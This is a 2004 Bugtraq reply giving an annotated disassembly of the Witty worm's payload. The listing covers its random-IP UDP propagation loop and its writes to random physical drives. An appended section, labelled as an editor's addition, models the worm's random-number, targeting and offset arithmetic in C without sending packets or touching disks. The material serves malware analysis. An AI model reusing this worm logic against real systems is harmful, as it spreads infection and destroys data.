Message-ID: <405C81AF.2030900@renater.fr>
Date: Sat, 20 Mar 2004 18:38:55 +0100
From: Kostya Kortchinsky <kostya.kortchinsky@...ater.fr>
To: bugtraq@...urityfocus.com
Subject: Re: Any dissasemblies of the Witty worm yet?



Here is some preliminary work, I don't claim it to be exact, since
the API calls are guessed at the moment (I still have to get BlackICE),
but it should give a pretty good idea of how the thing works.

The WriteFile might be ReadFile (which is the way Symantec sees it in
their analysis), but in my opinion the GENERIC_WRITE flag (and the fact
that the memory at 0x5e000000 might be a code section, hence not writeable)
makes me think it writes to arbitrary places on random physical disks -
with the consequences one can imagine.

Correct me if I am wrong, I would like to receive feedback about this.

Regards,

Kostya Kortchinsky
CERT RENATER

Nicholas Weaver wrote:

> Has anyone done a disassembly of the "Witty" worm yet?
> 
> http://isc.incidents.org/diary.html?date=2004-03-20
> http://securityresponse.symantec.com/avcenter/venc/data/w32.witty.worm.html
> 
> 	using the 
> http://seclists.org/lists/bugtraq/2004/Mar/0181.html
> 	recent bug in BlackICE/RealSecure?
> 
> 	We are seeing a lot of activity from this worm, although even
> a small infection would generate a LOT of traffic (a side-effect of
> bandwidth-limited worms, such as single-packet UDP worms).
> 
> 	Thanks.
> 

seg000:000000D1 ; ---------------------------------------------------------------------------
seg000:000000D1
seg000:000000D1                   loc_D1:                                 ; CODE XREF: seg000:000002ABj
seg000:000000D1 89 E7                             mov     edi, esp
seg000:000000D3 8B 7F 14                          mov     edi, [edi+14h]
seg000:000000D6 83 C7 08                          add     edi, 8
seg000:000000D9 81 C4 E8 FD FF FF                 add     esp, 0FFFFFDE8h
seg000:000000DF 31 C9                             xor     ecx, ecx
seg000:000000E1 66 B9 33 32                       mov     cx, 3233h               ; 32
seg000:000000E5 51                                push    ecx
seg000:000000E6 68 77 73 32 5F                    push    5F327377h               ; ws2_
seg000:000000EB 54                                push    esp
seg000:000000EC                                   db      3Eh
seg000:000000EC 3E FF 15 9C 40 0D+                call    dword ptr ds:5E0D409Ch  ; Probably LoadLibrary
seg000:000000F3 89 C3                             mov     ebx, eax
seg000:000000F5 31 C9                             xor     ecx, ecx
seg000:000000F7 66 B9 65 74                       mov     cx, 7465h               ; et
seg000:000000FB 51                                push    ecx
seg000:000000FC 68 73 6F 63 6B                    push    6B636F73h               ; sock
seg000:00000101 54                                push    esp
seg000:00000102 53                                push    ebx
seg000:00000103                                   db      3Eh
seg000:00000103 3E FF 15 98 40 0D+                call    dword ptr ds:5E0D4098h  ; Probably GetProcAddress
seg000:0000010A 6A 11                             push    11h                     ; IPPROTO_UDP
seg000:0000010C 6A 02                             push    2                       ; SOCK_DGRAM
seg000:0000010E 6A 02                             push    2                       ; AF_INET
seg000:00000110 FF D0                             call    eax                     ; socket()
seg000:00000112 89 C6                             mov     esi, eax
seg000:00000114 31 C9                             xor     ecx, ecx
seg000:00000116 51                                push    ecx
seg000:00000117 68 62 69 6E 64                    push    646E6962h               ; bind
seg000:0000011C 54                                push    esp
seg000:0000011D 53                                push    ebx
seg000:0000011E                                   db      3Eh
seg000:0000011E 3E FF 15 98 40 0D+                call    dword ptr ds:5E0D4098h  ; Probably GetProcAddress
seg000:00000125 31 C9                             xor     ecx, ecx
seg000:00000127 51                                push    ecx
seg000:00000128 51                                push    ecx
seg000:00000129 51                                push    ecx                     ; sin.sin_addr.s_addr = INADDR_ANY
seg000:0000012A 81 E9 FE FF F0 5F                 sub     ecx, 5FF0FFFEh          ; 0xa00f0002
seg000:00000130 51                                push    ecx                     ; sin.sin_family = AF_INET
seg000:00000130                                                                   ; sin.sin_port = htons(4000)
seg000:00000131 89 E1                             mov     ecx, esp
seg000:00000133 6A 10                             push    10h                     ; sizeof(struct sockaddr)
seg000:00000135 51                                push    ecx                     ; &sin
seg000:00000136 56                                push    esi                     ; s
seg000:00000137 FF D0                             call    eax                     ; bind()
seg000:00000139 31 C9                             xor     ecx, ecx
seg000:0000013B 66 B9 74 6F                       mov     cx, 6F74h               ; to
seg000:0000013F 51                                push    ecx
seg000:00000140 68 73 65 6E 64                    push    646E6573h               ; send
seg000:00000145 54                                push    esp
seg000:00000146 53                                push    ebx
seg000:00000147                                   db      3Eh
seg000:00000147 3E FF 15 98 40 0D+                call    dword ptr ds:5E0D4098h  ; Probably GetProcAddress
seg000:0000014E 89 C3                             mov     ebx, eax
seg000:00000150 83 C4 3C                          add     esp, 3Ch
seg000:00000153
seg000:00000153                   loc_153:                                ; CODE XREF: seg000:000002A2j
seg000:00000153 31 C9                             xor     ecx, ecx
seg000:00000155 51                                push    ecx
seg000:00000156 68 65 6C 33 32                    push    32336C65h               ; el32
seg000:0000015B 68 6B 65 72 6E                    push    6E72656Bh               ; kern
seg000:00000160 54                                push    esp
seg000:00000161                                   db      3Eh
seg000:00000161 3E FF 15 9C 40 0D+                call    dword ptr ds:5E0D409Ch  ; Probably LoadLibrary
seg000:00000168 31 C9                             xor     ecx, ecx
seg000:0000016A 51                                push    ecx
seg000:0000016B 68 6F 75 6E 74                    push    746E756Fh               ; ount
seg000:00000170 68 69 63 6B 43                    push    436B6369h               ; ickC
seg000:00000175 68 47 65 74 54                    push    54746547h               ; GetT
seg000:0000017A 54                                push    esp
seg000:0000017B 50                                push    eax
seg000:0000017C                                   db      3Eh
seg000:0000017C 3E FF 15 98 40 0D+                call    dword ptr ds:5E0D4098h  ; Probably GetProcAddress
seg000:00000183 FF D0                             call    eax                     ; GetTickCount()
seg000:00000185 89 C5                             mov     ebp, eax
seg000:00000187 83 C4 1C                          add     esp, 1Ch
seg000:0000018A 31 C9                             xor     ecx, ecx
seg000:0000018C 81 E9 E0 B1 FF FF                 sub     ecx, 0FFFFB1E0h         ; 0x4e20
seg000:00000192
seg000:00000192                   loc_192:                                ; CODE XREF: seg000:000001F8j
seg000:00000192                                                                   ; seg000:00000255j
seg000:00000192 51                                push    ecx
seg000:00000193 31 C0                             xor     eax, eax
seg000:00000195 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h         ; 0x343fd
seg000:0000019A F7 E5                             mul     ebp
seg000:0000019C 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh         ; 0x269ec3
seg000:000001A1 89 C1                             mov     ecx, eax                ; rand() function, without the 0x7fff mask, shift coming afterwards
seg000:000001A1                                                                   ; srand() done with GetTickCount()
seg000:000001A3 31 C0                             xor     eax, eax
seg000:000001A5 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:000001AA F7 E1                             mul     ecx
seg000:000001AC 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:000001B1 89 C5                             mov     ebp, eax
seg000:000001B3 31 D2                             xor     edx, edx
seg000:000001B5 52                                push    edx
seg000:000001B6 52                                push    edx
seg000:000001B7 C1 E9 10                          shr     ecx, 10h
seg000:000001BA 66 89 C8                          mov     ax, cx
seg000:000001BD 50                                push    eax                     ; to.sin_addr.s_addr = (rand() << 16) | rand()
seg000:000001BE 31 C0                             xor     eax, eax
seg000:000001C0 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:000001C5 F7 E5                             mul     ebp
seg000:000001C7 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:000001CC 89 C5                             mov     ebp, eax
seg000:000001CE 30 E4                             xor     ah, ah
seg000:000001D0 B0 02                             mov     al, 2
seg000:000001D2 50                                push    eax                     ; to.sin_family = AF_INET
seg000:000001D2                                                                   ; to.sin_port = rand()
seg000:000001D3 89 E0                             mov     eax, esp
seg000:000001D5 6A 10                             push    10h                     ; sizeof(struct sockaddr)
seg000:000001D7 50                                push    eax                     ; &to
seg000:000001D8 31 C0                             xor     eax, eax
seg000:000001DA 50                                push    eax                     ; flags
seg000:000001DB 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:000001E0 F7 E5                             mul     ebp
seg000:000001E2 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:000001E7 89 C5                             mov     ebp, eax
seg000:000001E9 C1 E8 17                          shr     eax, 17h
seg000:000001EC 80 C4 03                          add     ah, 3
seg000:000001EF 50                                push    eax                     ; len = 0x300 + (rand() >> 7)
seg000:000001F0 57                                push    edi                     ; buf
seg000:000001F1 56                                push    esi                     ; s
seg000:000001F2 FF D3                             call    ebx                     ; sendto()
seg000:000001F4 83 C4 10                          add     esp, 10h
seg000:000001F7 59                                pop     ecx
seg000:000001F8 E2 98                             loop    loc_192
seg000:000001FA 31 C0                             xor     eax, eax
seg000:000001FC 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:00000201 F7 E5                             mul     ebp
seg000:00000203 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:00000208 89 C5                             mov     ebp, eax
seg000:0000020A C1 E8 10                          shr     eax, 10h
seg000:0000020D 80 E4 07                          and     ah, 7
seg000:00000210 80 CC 30                          or      ah, 30h                 ; 0x30 | (rand() & 7)
seg000:00000213 B0 45                             mov     al, 45h                 ; 'E'
seg000:00000215 50                                push    eax
seg000:00000216 68 44 52 49 56                    push    56495244h               ; DRIV
seg000:0000021B 68 49 43 41 4C                    push    4C414349h               ; ICAL
seg000:00000220 68 50 48 59 53                    push    53594850h               ; PHYS
seg000:00000225 68 5C 5C 2E 5C                    push    5C2E5C5Ch               ; \\.\
seg000:00000225                                                                   ; we get here \\.\PHYSICALDRIVE0 to \\.\PHYSICALDRIVE7
seg000:0000022A 89 E0                             mov     eax, esp
seg000:0000022C 31 C9                             xor     ecx, ecx
seg000:0000022E 51                                push    ecx                     ; NULL
seg000:0000022F B2 20                             mov     dl, 20h                 ; ' '
seg000:00000231 C1 E2 18                          shl     edx, 18h
seg000:00000234 52                                push    edx                     ; FILE_FLAG_NO_BUFFERING (0x20000000)
seg000:00000235 6A 03                             push    3                       ; OPEN_EXISTING
seg000:00000237 51                                push    ecx                     ; NULL
seg000:00000238 6A 03                             push    3                       ; FILE_SHARE_READ | FILE_SHARE_WRITE
seg000:0000023A D1 E2                             shl     edx, 1
seg000:0000023C 52                                push    edx                     ; GENERIC_WRITE (0x40000000)
seg000:0000023D 50                                push    eax                     ; lpFileName
seg000:0000023E                                   db      3Eh
seg000:0000023E 3E FF 15 DC 40 0D+                call    dword ptr ds:5E0D40DCh  ; Probably CreateFile
seg000:00000245 83 C4 14                          add     esp, 14h
seg000:00000248 31 C9                             xor     ecx, ecx
seg000:0000024A 81 E9 E0 B1 FF FF                 sub     ecx, 0FFFFB1E0h         ; 0x4e20
seg000:00000250 3D FF FF FF FF                    cmp     eax, 0FFFFFFFFh
seg000:00000255 0F 84 37 FF FF FF                 jz      loc_192
seg000:0000025B 56                                push    esi                     ; (saving socket)
seg000:0000025C 89 C6                             mov     esi, eax
seg000:0000025E 31 C0                             xor     eax, eax
seg000:00000260 50                                push    eax                     ; FILE_BEGIN
seg000:00000261 50                                push    eax                     ; NULL
seg000:00000262 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:00000267 F7 E5                             mul     ebp
seg000:00000269 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:0000026E 89 C5                             mov     ebp, eax
seg000:00000270 D1 E8                             shr     eax, 1
seg000:00000272 66 89 C8                          mov     ax, cx
seg000:00000275 50                                push    eax                     ; (rand() << 15) | 0x4e20
seg000:00000276 56                                push    esi                     ; hFile
seg000:00000277                                   db      3Eh
seg000:00000277 3E FF 15 C4 40 0D+                call    dword ptr ds:5E0D40C4h  ; Probably SetFilePointer
seg000:00000277 5E                                                                ; (really not sure about this one)
seg000:0000027E 31 C9                             xor     ecx, ecx
seg000:00000280 51                                push    ecx                     ; 0
seg000:00000281 89 E2                             mov     edx, esp
seg000:00000283 51                                push    ecx                     ; NULL
seg000:00000284 52                                push    edx                     ; lpNumberOfBytesWritten
seg000:00000285 B5 80                             mov     ch, 80h                 ; 'Ç'
seg000:00000287 D1 E1                             shl     ecx, 1
seg000:00000289 51                                push    ecx                     ; nNumberOfBytesToWrite (0x10000)
seg000:0000028A B1 5E                             mov     cl, 5Eh                 ; '^'
seg000:0000028C C1 E1 18                          shl     ecx, 18h
seg000:0000028F 51                                push    ecx                     ; lpBuffer (0x5e000000)
seg000:00000290 56                                push    esi                     ; hFile
seg000:00000291                                   db      3Eh
seg000:00000291 3E FF 15 94 40 0D+                call    dword ptr ds:5E0D4094h  ; Probably WriteFile
seg000:00000298 56                                push    esi                     ; hObject
seg000:00000299                                   db      3Eh
seg000:00000299 3E FF 15 38 40 0D+                call    dword ptr ds:5E0D4038h  ; Probably CloseHandle
seg000:000002A0 5E                                pop     esi
seg000:000002A1 5E                                pop     esi                     ; (restoring socket)
seg000:000002A2 E9 AC FE FF FF                    jmp     loc_153
seg000:000002A2 ; ---------------------------------------------------------------------------
seg000:000002A7 63 76 07 5E                       dd 5E077663h
seg000:000002AB ; ---------------------------------------------------------------------------
seg000:000002AB E9 21 FE FF FF                    jmp     loc_D1
seg000:000002AB ; ---------------------------------------------------------------------------
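The following C model is an added example by the editor, not the worm's code and not part of Kostya's post. It reproduces, in plain arithmetic, what the annotated listing computes: the linear congruential generator at loc_192 (the constants 0x343FD and 0x269EC3 are those of the Microsoft CRT rand(), seed*214013+2531011, which is a fact independent of the post), the destination address, port and length pushed for each of the 0x4E20 = 20000 sendto() calls, and the drive index and file offset chosen after the loop. It assumes the API identifications in the listing (sendto, CreateFile, SetFilePointer, WriteFile) are right, stands in a caller-supplied value for the GetTickCount() seed, and sends nothing and touches no disk, so it can be run on any host to check the annotations against a capture.

```c
/* Editor's reconstruction of Witty's packet-generation and disk-write
 * arithmetic from the listing above.  Not the worm, not the poster's code.
 * The LCG constants are those of the Microsoft CRT rand(). */
#include <stdint.h>
#include <stdio.h>

#define WITTY_PACKETS_PER_CYCLE 0x4E20u   /* 20000: the loop count at 0x18C and 0x24A */

/* State update at 0x193-0x1A1: eax = 0x343FD * ebp + 0x269EC3 (mod 2^32). */
static uint32_t witty_step(uint32_t *state)
{
    *state = *state * 0x343FDu + 0x269EC3u;
    return *state;
}

/* What the CRT rand() would return from the same state, for comparison. */
static int msvc_rand(uint32_t *state)
{
    return (int)((witty_step(state) >> 16) & 0x7FFFu);
}

struct witty_packet {
    uint8_t  dst[4];     /* destination IPv4 address, dotted order */
    uint16_t dst_port;   /* destination UDP port, host byte order */
    uint32_t len;        /* byte count handed to sendto() */
};

/* One pass through the loop at loc_192 (0x192-0x1F8). */
static struct witty_packet witty_next_packet(uint32_t *state)
{
    struct witty_packet p;
    uint32_t r1 = witty_step(state);               /* ends up in ecx */
    uint32_t r2 = witty_step(state);               /* ends up in ebp, still in eax */
    /* shr ecx,10h ; mov ax,cx : low half from r1>>16, high half from r2 */
    uint32_t addr_raw = (r2 & 0xFFFF0000u) | (r1 >> 16);
    /* sin_addr is stored little-endian, so byte 0 is the first octet */
    p.dst[0] = (uint8_t)(addr_raw);
    p.dst[1] = (uint8_t)(addr_raw >> 8);
    p.dst[2] = (uint8_t)(addr_raw >> 16);
    p.dst[3] = (uint8_t)(addr_raw >> 24);
    uint32_t r3 = witty_step(state);               /* xor ah,ah ; mov al,2 keeps the top half */
    uint16_t port_raw = (uint16_t)(r3 >> 16);      /* the two bytes stored in sin_port */
    p.dst_port = (uint16_t)((port_raw << 8) | (port_raw >> 8));   /* ntohs */
    uint32_t r4 = witty_step(state);
    p.len = 0x300u + (r4 >> 23);                   /* shr eax,17h ; add ah,3 */
    return p;
}

struct witty_disk_write {
    unsigned drive;      /* N in \\.\PHYSICALDRIVEN, 0..7 */
    uint32_t offset;     /* lDistanceToMove given to SetFilePointer */
    uint32_t length;     /* nNumberOfBytesToWrite, always 0x10000 */
};

/* The code after the loop (0x1FA-0x275): pick a drive, then an offset. */
static struct witty_disk_write witty_disk_target(uint32_t *state)
{
    struct witty_disk_write w;
    uint32_t r5 = witty_step(state);
    w.drive = (r5 >> 24) & 7u;                     /* shr eax,10h ; and ah,7 ; or ah,30h */
    uint32_t r6 = witty_step(state);
    w.offset = ((r6 >> 1) & 0xFFFF0000u) | 0x4E20u; /* shr eax,1 ; mov ax,cx (cx = 0x4E20) */
    w.length = 0x10000u;
    return w;
}

/* One full cycle as the listing runs it: 20000 packets, then one disk write.
 * tick_seed stands in for the GetTickCount() value loaded at loc_153; the
 * listing jumps back there and reseeds after every write. */
static struct witty_disk_write witty_cycle(uint32_t tick_seed)
{
    uint32_t state = tick_seed;
    for (unsigned i = 0; i < WITTY_PACKETS_PER_CYCLE; i++)
        (void)witty_next_packet(&state);
    return witty_disk_target(&state);
}

/* Decode the sockaddr_in dword pushed for bind() at 0x12A (0xA00F0002). */
static uint16_t sockaddr_dword_family(uint32_t dword)
{
    return (uint16_t)(dword & 0xFFFFu);
}
static uint16_t sockaddr_dword_port(uint32_t dword)
{
    uint16_t raw = (uint16_t)(dword >> 16);
    return (uint16_t)((raw << 8) | (raw >> 8));   /* ntohs */
}

int main(void)
{
    uint32_t state = 0;                            /* constructed seed, not a real tick count */
    for (int i = 0; i < 3; i++) {
        struct witty_packet p = witty_next_packet(&state);
        printf("%u.%u.%u.%u:%u len=%u\n", p.dst[0], p.dst[1], p.dst[2], p.dst[3],
               (unsigned)p.dst_port, (unsigned)p.len);
    }
    struct witty_disk_write w = witty_cycle(0);
    printf("after %u packets: \\\\.\\PHYSICALDRIVE%u offset=0x%08x len=0x%x\n",
           WITTY_PACKETS_PER_CYCLE, w.drive, (unsigned)w.offset, (unsigned)w.length);
    printf("bind(): family=%u port=%u\n", (unsigned)sockaddr_dword_family(0xA00F0002u),
           (unsigned)sockaddr_dword_port(0xA00F0002u));
    return 0;
}
```

With seed 0, msvc_rand() yields 38, 7719, 21238, which is the well-known srand(0) sequence of the Microsoft CRT, so the constants read off the listing are the CRT's. The first packet for that seed goes to 38.0.39.30, port 63186, with 787 bytes; the bind() constant decodes to AF_INET on port 4000 as annotated. Two things the model makes visible that the listing only implies: the length is always 0x300 + (0..0x1FF), i.e. 768 to 1279 bytes, and the write offset always ends in 0x4E20 and stays below 2 GiB because the high word is taken from bits 17..31 of the state.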

